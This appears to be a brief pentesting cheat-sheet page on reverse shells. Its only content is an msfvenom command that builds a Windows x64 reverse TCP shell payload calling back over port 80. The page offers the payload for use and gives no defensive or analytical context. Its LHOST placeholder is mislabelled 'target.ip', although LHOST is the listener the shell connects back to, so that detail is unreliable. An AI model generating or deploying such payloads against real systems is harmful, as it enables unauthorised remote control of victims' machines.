For the complete documentation index, see llms.txt. This page is also available as Markdown.

reverse-shells

using msfvenom

msfvenom -p windows/shell/reverse_tcp LHOST=target.ip LPORT=80 --platform windows -a x64

Last updated